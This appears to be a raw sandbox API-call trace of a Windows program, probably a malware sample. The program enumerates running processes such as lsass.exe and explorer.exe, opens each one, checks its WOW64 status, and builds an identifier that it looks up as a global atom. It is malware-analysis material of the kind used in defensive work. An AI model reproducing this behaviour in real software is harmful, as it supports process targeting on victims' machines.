	[0084.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e998, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x65c
	[0084.318] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.318] CloseHandle (hObject=0x65c) returned 1
	[0084.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x65c
	[0084.318] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.318] CloseHandle (hObject=0x65c) returned 1
	[0084.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396e8b0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x65c
	[0084.319] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.319] CloseHandle (hObject=0x65c) returned 1
	[0084.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x65c
	[0084.319] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.319] CloseHandle (hObject=0x65c) returned 1
	[0084.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x65c
	[0084.319] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.319] CloseHandle (hObject=0x65c) returned 1
	[0084.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x3985cd8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x65c
	[0084.320] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.320] CloseHandle (hObject=0x65c) returned 1
	[0084.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x3985b20, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x65c
	[0084.320] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.320] CloseHandle (hObject=0x65c) returned 1
	[0084.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x65c
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.320] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetLastError () returned 0x5
	[0084.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.322] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.322] GetProcessTimes (in: hProcess=0x65c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.322] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.323] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetLastError () returned 0x5
	[0084.324] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.324] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.324] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.325] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.325] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.325] CloseHandle (hObject=0x65c) returned 1
	[0084.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397ea58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x65c
	[0084.325] IsWow64Process (in: hProcess=0x65c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.325] CloseHandle (hObject=0x65c) returned 1
	[0084.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397ea58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e9c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16de0) returned 0xc0000004
	[0084.366] VirtualAlloc (lpAddress=0x0, dwSize=0x16ee0, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0084.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x16ee0, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0084.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e9f8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397ea88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397ea88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c920, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0084.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x674
	[0084.371] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.372] CloseHandle (hObject=0x674) returned 1
	[0084.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396e930, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x674
	[0084.372] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.372] CloseHandle (hObject=0x674) returned 1
	[0084.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396e930, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x674
	[0084.373] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.373] CloseHandle (hObject=0x674) returned 1
	[0084.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x674
	[0084.373] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.373] CloseHandle (hObject=0x674) returned 1
	[0084.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x674
	[0084.373] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.373] CloseHandle (hObject=0x674) returned 1
	[0084.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x674
	[0084.374] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.374] CloseHandle (hObject=0x674) returned 1
	[0084.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x674
	[0084.374] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.374] CloseHandle (hObject=0x674) returned 1
	[0084.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x674
	[0084.374] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.374] CloseHandle (hObject=0x674) returned 1
	[0084.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x674
	[0084.375] IsWow64Process (in: hProcess=0x674, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
